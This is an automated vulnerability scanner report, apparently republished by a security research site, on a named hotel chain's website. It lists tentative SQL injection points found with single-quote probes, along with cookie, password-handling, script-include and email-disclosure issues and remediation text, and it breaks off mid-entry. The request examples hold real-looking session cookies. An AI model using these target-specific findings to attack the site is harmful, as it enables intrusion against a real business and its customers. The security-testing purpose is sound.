Report generated by XSS.CX at Tue Oct 12 19:32:54 CDT 2010.

Cross Site Scripting Reports | Hoyt LLC Research

Loading

1. SQL injection

1.1. http://www.redcarnationhotels.com/african-pride/terms-and-conditions [REST URL parameter 2]

1.2. http://www.redcarnationhotels.com/dining/bar-lounge [REST URL parameter 2]

1.3. http://www.redcarnationhotels.com/dining/food-wine [REST URL parameter 2]

1.4. http://www.redcarnationhotels.com/dining/food-wine/wine-events [REST URL parameter 2]

1.5. http://www.redcarnationhotels.com/dining/food-wine/wine-events [REST URL parameter 3]

1.6. http://www.redcarnationhotels.com/dining/seasonal-events [REST URL parameter 2]

1.7. http://www.redcarnationhotels.com/dining/traditional-treats [REST URL parameter 2]

1.8. http://www.redcarnationhotels.com/lloydstsb/terms [REST URL parameter 2]

1.9. http://www.redcarnationhotels.com/london-offers/terms-conditions [REST URL parameter 2]

1.10. http://www.redcarnationhotels.com/meet-the-team/terry-holmes [REST URL parameter 2]

1.11. http://www.redcarnationhotels.com/meet-the-team/terry-holmes/career [REST URL parameter 2]

1.12. http://www.redcarnationhotels.com/meet-the-team/terry-holmes/career [REST URL parameter 3]

1.13. http://www.redcarnationhotels.com/meetings-and-events/executive-club [REST URL parameter 2]

1.14. http://www.redcarnationhotels.com/meetings-and-events/executive-club/apply [REST URL parameter 2]

1.15. http://www.redcarnationhotels.com/meetings-and-events/executive-club/apply [REST URL parameter 3]

1.16. http://www.redcarnationhotels.com/meetings-and-events/executive-club/benefits [REST URL parameter 2]

1.17. http://www.redcarnationhotels.com/meetings-and-events/executive-club/benefits [REST URL parameter 3]

1.18. http://www.redcarnationhotels.com/meetings-and-events/facilities [REST URL parameter 2]

1.19. http://www.redcarnationhotels.com/meetings-and-events/special-offers [REST URL parameter 2]

1.20. http://www.redcarnationhotels.com/our-responsibilities/working-together [REST URL parameter 2]

1.21. http://www.redcarnationhotels.com/special-occasions/celebrations [REST URL parameter 2]

1.22. http://www.redcarnationhotels.com/special-occasions/escapes [REST URL parameter 2]

1.23. http://www.redcarnationhotels.com/special-occasions/tell-us [REST URL parameter 2]

1.24. http://www.redcarnationhotels.com/special-occasions/weddings [REST URL parameter 2]

1.25. http://www.redcarnationhotels.com/travel-agents/agents-commissions [REST URL parameter 2]

1.26. http://www.redcarnationhotels.com/travel-agents/sales-representatives [REST URL parameter 2]

1.27. http://www.redcarnationhotels.com/travel-agents/trade-shows [REST URL parameter 2]

1.28. http://www.redcarnationhotels.com/useful-links/useful-travel-links_1 [REST URL parameter 2]

1.29. http://www.redcarnationhotels.com/your-stay/business-pleasure [REST URL parameter 2]

1.30. http://www.redcarnationhotels.com/your-stay/family [REST URL parameter 2]

1.31. http://www.redcarnationhotels.com/your-stay/female-traveller [REST URL parameter 2]

1.32. http://www.redcarnationhotels.com/your-stay/pets [REST URL parameter 2]

1.33. http://www.redcarnationhotels.com/your-stay/rch-video-tour [REST URL parameter 2]

1.34. http://www.redcarnationhotels.com/your-stay/thoughtul-touches [REST URL parameter 2]

2. Cookie without HttpOnly flag set

2.1. http://www.redcarnationhotels.com/

2.2. http://www.redcarnationhotels.com/careers

2.3. http://www.redcarnationhotels.com/company-information/about-us

2.4. http://www.redcarnationhotels.com/company-information/about-us/core-values

2.5. http://www.redcarnationhotels.com/company-information/about-us/history

2.6. http://www.redcarnationhotels.com/company-information/accessibility-info

2.7. http://www.redcarnationhotels.com/company-information/best-rate-guarantee

2.8. http://www.redcarnationhotels.com/company-information/disclaimer

2.9. http://www.redcarnationhotels.com/company-information/privacy-policy

2.10. http://www.redcarnationhotels.com/company-information/telephone-bookings

2.11. http://www.redcarnationhotels.com/contact-us

2.12. http://www.redcarnationhotels.com/dining

2.13. http://www.redcarnationhotels.com/faq

2.14. http://www.redcarnationhotels.com/london-offers

2.15. http://www.redcarnationhotels.com/meet-the-team

2.16. http://www.redcarnationhotels.com/offers-and-gifts

2.17. http://www.redcarnationhotels.com/offers-and-gifts/gift-vouchers

2.18. http://www.redcarnationhotels.com/our-hotels

2.19. http://www.redcarnationhotels.com/our-responsibilities

2.20. http://www.redcarnationhotels.com/partners

2.21. http://www.redcarnationhotels.com/press-room

2.22. http://www.redcarnationhotels.com/press-room/destination-news

2.23. http://www.redcarnationhotels.com/refer-a-friend

2.24. http://www.redcarnationhotels.com/search

2.25. http://www.redcarnationhotels.com/site-map

2.26. http://www.redcarnationhotels.com/special-occasions

2.27. http://www.redcarnationhotels.com/travel-agents

2.28. http://www.redcarnationhotels.com/useful-links

2.29. http://www.redcarnationhotels.com/wellness

2.30. http://www.redcarnationhotels.com/your-stay

3. Password field with autocomplete enabled

4. Cleartext submission of password

5. Cross-domain script include

5.1. http://www.redcarnationhotels.com/

5.2. http://www.redcarnationhotels.com/african-pride

5.3. http://www.redcarnationhotels.com/african-pride/terms-and-conditions

5.4. http://www.redcarnationhotels.com/careers

5.5. http://www.redcarnationhotels.com/careers/awards

5.6. http://www.redcarnationhotels.com/careers/fraudulent-emails

5.7. http://www.redcarnationhotels.com/careers/hr-podcast

5.8. http://www.redcarnationhotels.com/careers/join-the-family

5.9. http://www.redcarnationhotels.com/careers/rewards

5.10. http://www.redcarnationhotels.com/careers/rewards/benefits

5.11. http://www.redcarnationhotels.com/careers/rewards/equal-opportunities

5.12. http://www.redcarnationhotels.com/careers/training

5.13. http://www.redcarnationhotels.com/careers/training/internal-training

5.14. http://www.redcarnationhotels.com/careers/training/international-qualifications

5.15. http://www.redcarnationhotels.com/careers/training/management-programmes

5.16. http://www.redcarnationhotels.com/careers/training/management-programmes/management1

5.17. http://www.redcarnationhotels.com/careers/training/placements

5.18. http://www.redcarnationhotels.com/christmas_hotel_london

5.19. http://www.redcarnationhotels.com/christmas_hotel_london/special-events

5.20. http://www.redcarnationhotels.com/company-information/about-us

5.21. http://www.redcarnationhotels.com/company-information/about-us/core-values

5.22. http://www.redcarnationhotels.com/company-information/about-us/history

5.23. http://www.redcarnationhotels.com/company-information/accessibility-info

5.24. http://www.redcarnationhotels.com/company-information/best-rate-guarantee

5.25. http://www.redcarnationhotels.com/company-information/disclaimer

5.26. http://www.redcarnationhotels.com/company-information/privacy-policy

5.27. http://www.redcarnationhotels.com/company-information/telephone-bookings

5.28. http://www.redcarnationhotels.com/contact-us

5.29. http://www.redcarnationhotels.com/dining

5.30. http://www.redcarnationhotels.com/dining/bar-lounge

5.31. http://www.redcarnationhotels.com/dining/food-wine

5.32. http://www.redcarnationhotels.com/dining/food-wine/wine-events

5.33. http://www.redcarnationhotels.com/dining/seasonal-events

5.34. http://www.redcarnationhotels.com/dining/traditional-treats

5.35. http://www.redcarnationhotels.com/faq

5.36. http://www.redcarnationhotels.com/gay_friendly_hotels

5.37. http://www.redcarnationhotels.com/gay_london

5.38. http://www.redcarnationhotels.com/get-more-from-your-stay

5.39. http://www.redcarnationhotels.com/grand-designs

5.40. http://www.redcarnationhotels.com/haughton-exhibitors

5.41. http://www.redcarnationhotels.com/haughtons-art-antiques-fair

5.42. http://www.redcarnationhotels.com/kate-starkey-couture

5.43. http://www.redcarnationhotels.com/lloydstsb

5.44. http://www.redcarnationhotels.com/lloydstsb/terms

5.45. http://www.redcarnationhotels.com/london-offers

5.46. http://www.redcarnationhotels.com/london-offers/terms-conditions

5.47. http://www.redcarnationhotels.com/london_theatre_break

5.48. http://www.redcarnationhotels.com/london_weekend_break

5.49. http://www.redcarnationhotels.com/meet-the-team

5.50. http://www.redcarnationhotels.com/meet-the-team/terry-holmes

5.51. http://www.redcarnationhotels.com/meet-the-team/terry-holmes/career

5.52. http://www.redcarnationhotels.com/meetings-and-events

5.53. http://www.redcarnationhotels.com/meetings-and-events/executive-club

5.54. http://www.redcarnationhotels.com/meetings-and-events/executive-club/apply

5.55. http://www.redcarnationhotels.com/meetings-and-events/executive-club/benefits

5.56. http://www.redcarnationhotels.com/meetings-and-events/facilities

5.57. http://www.redcarnationhotels.com/meetings-and-events/special-offers

5.58. http://www.redcarnationhotels.com/newsletter

5.59. http://www.redcarnationhotels.com/offers-and-gifts

5.60. http://www.redcarnationhotels.com/offers-and-gifts/gift-vouchers

5.61. http://www.redcarnationhotels.com/offers-and-gifts/gifts

5.62. http://www.redcarnationhotels.com/our-hotels

5.63. http://www.redcarnationhotels.com/our-responsibilities

5.64. http://www.redcarnationhotels.com/our-responsibilities/acting-global

5.65. http://www.redcarnationhotels.com/our-responsibilities/ark-foundation

5.66. http://www.redcarnationhotels.com/our-responsibilities/thinking-local

5.67. http://www.redcarnationhotels.com/our-responsibilities/working-together

5.68. http://www.redcarnationhotels.com/parties

5.69. http://www.redcarnationhotels.com/partners

5.70. http://www.redcarnationhotels.com/press-room

5.71. http://www.redcarnationhotels.com/press-room/awards--accolades

5.72. http://www.redcarnationhotels.com/press-room/contact-us

5.73. http://www.redcarnationhotels.com/press-room/destination-news

5.74. http://www.redcarnationhotels.com/press-room/podcasts

5.75. http://www.redcarnationhotels.com/press-room/podcasts/roger_collis

5.76. http://www.redcarnationhotels.com/press-room/podcasts/this-week-in-london

5.77. http://www.redcarnationhotels.com/press-room/rss

5.78. http://www.redcarnationhotels.com/promoza

5.79. http://www.redcarnationhotels.com/refer-a-friend

5.80. http://www.redcarnationhotels.com/search

5.81. http://www.redcarnationhotels.com/side-images

5.82. http://www.redcarnationhotels.com/site-map

5.83. http://www.redcarnationhotels.com/special-occasions

5.84. http://www.redcarnationhotels.com/special-occasions/celebrations

5.85. http://www.redcarnationhotels.com/special-occasions/escapes

5.86. http://www.redcarnationhotels.com/special-occasions/tell-us

5.87. http://www.redcarnationhotels.com/special-occasions/weddings

5.88. http://www.redcarnationhotels.com/test_1

5.89. http://www.redcarnationhotels.com/travel-agents

5.90. http://www.redcarnationhotels.com/travel-agents/agents-commissions

5.91. http://www.redcarnationhotels.com/travel-agents/sales-representatives

5.92. http://www.redcarnationhotels.com/travel-agents/trade-shows

5.93. http://www.redcarnationhotels.com/useful-links

5.94. http://www.redcarnationhotels.com/useful-links/useful-travel-links_1

5.95. http://www.redcarnationhotels.com/usvirginatlantic

5.96. http://www.redcarnationhotels.com/wellness

5.97. http://www.redcarnationhotels.com/what-is-rss

5.98. http://www.redcarnationhotels.com/your-stay

5.99. http://www.redcarnationhotels.com/your-stay/business-pleasure

5.100. http://www.redcarnationhotels.com/your-stay/family

5.101. http://www.redcarnationhotels.com/your-stay/female-traveller

5.102. http://www.redcarnationhotels.com/your-stay/pets

5.103. http://www.redcarnationhotels.com/your-stay/rch-video-tour

5.104. http://www.redcarnationhotels.com/your-stay/thoughtul-touches

6. Email addresses disclosed

6.1. http://www.redcarnationhotels.com/

6.2. http://www.redcarnationhotels.com/african-pride

6.3. http://www.redcarnationhotels.com/african-pride/terms-and-conditions

6.4. http://www.redcarnationhotels.com/careers

6.5. http://www.redcarnationhotels.com/careers/awards

6.6. http://www.redcarnationhotels.com/careers/fraudulent-emails

6.7. http://www.redcarnationhotels.com/careers/hr-podcast

6.8. http://www.redcarnationhotels.com/careers/join-the-family

6.9. http://www.redcarnationhotels.com/careers/rewards

6.10. http://www.redcarnationhotels.com/careers/rewards/benefits

6.11. http://www.redcarnationhotels.com/careers/rewards/equal-opportunities

6.12. http://www.redcarnationhotels.com/careers/training

6.13. http://www.redcarnationhotels.com/careers/training/internal-training

6.14. http://www.redcarnationhotels.com/careers/training/international-qualifications

6.15. http://www.redcarnationhotels.com/careers/training/management-programmes

6.16. http://www.redcarnationhotels.com/careers/training/management-programmes/management1

6.17. http://www.redcarnationhotels.com/careers/training/placements

6.18. http://www.redcarnationhotels.com/christmas_hotel_london

6.19. http://www.redcarnationhotels.com/christmas_hotel_london/special-events

6.20. http://www.redcarnationhotels.com/company-information/about-us

6.21. http://www.redcarnationhotels.com/company-information/about-us/core-values

6.22. http://www.redcarnationhotels.com/company-information/about-us/history

6.23. http://www.redcarnationhotels.com/company-information/accessibility-info

6.24. http://www.redcarnationhotels.com/company-information/best-rate-guarantee

6.25. http://www.redcarnationhotels.com/company-information/disclaimer

6.26. http://www.redcarnationhotels.com/company-information/privacy-policy

6.27. http://www.redcarnationhotels.com/company-information/telephone-bookings

6.28. http://www.redcarnationhotels.com/contact-us

6.29. http://www.redcarnationhotels.com/dining

6.30. http://www.redcarnationhotels.com/dining/bar-lounge

6.31. http://www.redcarnationhotels.com/dining/food-wine

6.32. http://www.redcarnationhotels.com/dining/food-wine/wine-events

6.33. http://www.redcarnationhotels.com/dining/seasonal-events

6.34. http://www.redcarnationhotels.com/dining/traditional-treats

6.35. http://www.redcarnationhotels.com/faq

6.36. http://www.redcarnationhotels.com/gay_friendly_hotels

6.37. http://www.redcarnationhotels.com/gay_london

6.38. http://www.redcarnationhotels.com/get-more-from-your-stay

6.39. http://www.redcarnationhotels.com/grand-designs

6.40. http://www.redcarnationhotels.com/haughton-exhibitors

6.41. http://www.redcarnationhotels.com/haughtons-art-antiques-fair

6.42. http://www.redcarnationhotels.com/kate-starkey-couture

6.43. http://www.redcarnationhotels.com/lloydstsb

6.44. http://www.redcarnationhotels.com/lloydstsb/terms

6.45. http://www.redcarnationhotels.com/london-offers

6.46. http://www.redcarnationhotels.com/london-offers/terms-conditions

6.47. http://www.redcarnationhotels.com/london_theatre_break

6.48. http://www.redcarnationhotels.com/london_weekend_break

6.49. http://www.redcarnationhotels.com/meet-the-team

6.50. http://www.redcarnationhotels.com/meet-the-team/terry-holmes

6.51. http://www.redcarnationhotels.com/meet-the-team/terry-holmes/career

6.52. http://www.redcarnationhotels.com/meetings-and-events

6.53. http://www.redcarnationhotels.com/meetings-and-events/executive-club

6.54. http://www.redcarnationhotels.com/meetings-and-events/executive-club/apply

6.55. http://www.redcarnationhotels.com/meetings-and-events/executive-club/benefits

6.56. http://www.redcarnationhotels.com/meetings-and-events/facilities

6.57. http://www.redcarnationhotels.com/meetings-and-events/special-offers

6.58. http://www.redcarnationhotels.com/newsletter

6.59. http://www.redcarnationhotels.com/offers-and-gifts

6.60. http://www.redcarnationhotels.com/offers-and-gifts/gift-vouchers

6.61. http://www.redcarnationhotels.com/offers-and-gifts/gifts

6.62. http://www.redcarnationhotels.com/our-hotels

6.63. http://www.redcarnationhotels.com/our-responsibilities

6.64. http://www.redcarnationhotels.com/our-responsibilities/acting-global

6.65. http://www.redcarnationhotels.com/our-responsibilities/ark-foundation

6.66. http://www.redcarnationhotels.com/our-responsibilities/thinking-local

6.67. http://www.redcarnationhotels.com/our-responsibilities/working-together

6.68. http://www.redcarnationhotels.com/parties

6.69. http://www.redcarnationhotels.com/partners

6.70. http://www.redcarnationhotels.com/press-room

6.71. http://www.redcarnationhotels.com/press-room/awards--accolades

6.72. http://www.redcarnationhotels.com/press-room/contact-us

6.73. http://www.redcarnationhotels.com/press-room/destination-news

6.74. http://www.redcarnationhotels.com/press-room/podcasts

6.75. http://www.redcarnationhotels.com/press-room/podcasts/roger_collis

6.76. http://www.redcarnationhotels.com/press-room/podcasts/this-week-in-london

6.77. http://www.redcarnationhotels.com/press-room/rss

6.78. http://www.redcarnationhotels.com/promoza

6.79. http://www.redcarnationhotels.com/refer-a-friend

6.80. http://www.redcarnationhotels.com/search

6.81. http://www.redcarnationhotels.com/side-images

6.82. http://www.redcarnationhotels.com/site-map

6.83. http://www.redcarnationhotels.com/special-occasions

6.84. http://www.redcarnationhotels.com/special-occasions/celebrations

6.85. http://www.redcarnationhotels.com/special-occasions/escapes

6.86. http://www.redcarnationhotels.com/special-occasions/tell-us

6.87. http://www.redcarnationhotels.com/special-occasions/weddings

6.88. http://www.redcarnationhotels.com/test_1

6.89. http://www.redcarnationhotels.com/travel-agents

6.90. http://www.redcarnationhotels.com/travel-agents/agents-commissions

6.91. http://www.redcarnationhotels.com/travel-agents/sales-representatives

6.92. http://www.redcarnationhotels.com/travel-agents/trade-shows

6.93. http://www.redcarnationhotels.com/useful-links

6.94. http://www.redcarnationhotels.com/useful-links/useful-travel-links_1

6.95. http://www.redcarnationhotels.com/usvirginatlantic

6.96. http://www.redcarnationhotels.com/wellness

6.97. http://www.redcarnationhotels.com/what-is-rss

6.98. http://www.redcarnationhotels.com/your-stay

6.99. http://www.redcarnationhotels.com/your-stay/business-pleasure

6.100. http://www.redcarnationhotels.com/your-stay/family

6.101. http://www.redcarnationhotels.com/your-stay/female-traveller

6.102. http://www.redcarnationhotels.com/your-stay/pets

6.103. http://www.redcarnationhotels.com/your-stay/rch-video-tour

6.104. http://www.redcarnationhotels.com/your-stay/thoughtul-touches


1. SQL injection  next
There are 34 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:

1.1. http://www.redcarnationhotels.com/african-pride/terms-and-conditions [REST URL parameter 2]  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.redcarnationhotels.com
Path:   /african-pride/terms-and-conditions

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /african-pride/terms-and-conditions' HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/african-pride/
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response 1

HTTP/1.0 500 Internal Server Error
Date: Tue, 12 Oct 2010 02:48:21 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:48:21 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

Request 2

GET /african-pride/terms-and-conditions'' HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/african-pride/
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 12 Oct 2010 02:48:22 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:48:22 GMT
Cache-Control: private, no-store
Status: 404 Not Found
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22796

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>African Pride VIP Treatment -
...[SNIP]...
1.2. http://www.redcarnationhotels.com/dining/bar-lounge [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.redcarnationhotels.com
Path:   /dining/bar-lounge

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /dining/bar-lounge' HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/dining
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response 1

HTTP/1.0 500 Internal Server Error
Date: Tue, 12 Oct 2010 02:56:44 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:56:44 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

Request 2

GET /dining/bar-lounge'' HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/dining
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 12 Oct 2010 02:56:45 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:56:45 GMT
Cache-Control: private, no-store
Status: 404 Not Found
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 23399

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Fine dining & hotel restaurants
...[SNIP]...
1.3. http://www.redcarnationhotels.com/dining/food-wine [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.redcarnationhotels.com
Path:   /dining/food-wine

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /dining/food-wine' HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/dining
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response 1

HTTP/1.0 500 Internal Server Error
Date: Tue, 12 Oct 2010 02:55:54 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:55:54 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

Request 2

GET /dining/food-wine'' HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/dining
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 12 Oct 2010 02:55:55 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:55:55 GMT
Cache-Control: private, no-store
Status: 404 Not Found
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 23396

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Fine dining & hotel restaurants
...[SNIP]...
1.4. http://www.redcarnationhotels.com/dining/food-wine/wine-events [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.redcarnationhotels.com
Path:   /dining/food-wine/wine-events

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /dining/food-wine'/wine-events HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/site-map
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response 1

HTTP/1.0 500 Internal Server Error
Date: Tue, 12 Oct 2010 03:10:15 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 03:10:15 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

Request 2

GET /dining/food-wine''/wine-events HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/site-map
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 12 Oct 2010 03:10:19 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 03:10:19 GMT
Cache-Control: private, no-store
Status: 404 Not Found
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 23444

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Fine dining & hotel restaurants
...[SNIP]...
1.5. http://www.redcarnationhotels.com/dining/food-wine/wine-events [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.redcarnationhotels.com
Path:   /dining/food-wine/wine-events

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /dining/food-wine/wine-events' HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/site-map
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response 1

HTTP/1.0 500 Internal Server Error
Date: Tue, 12 Oct 2010 03:23:29 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 03:23:29 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

Request 2

GET /dining/food-wine/wine-events'' HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/site-map
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response 2

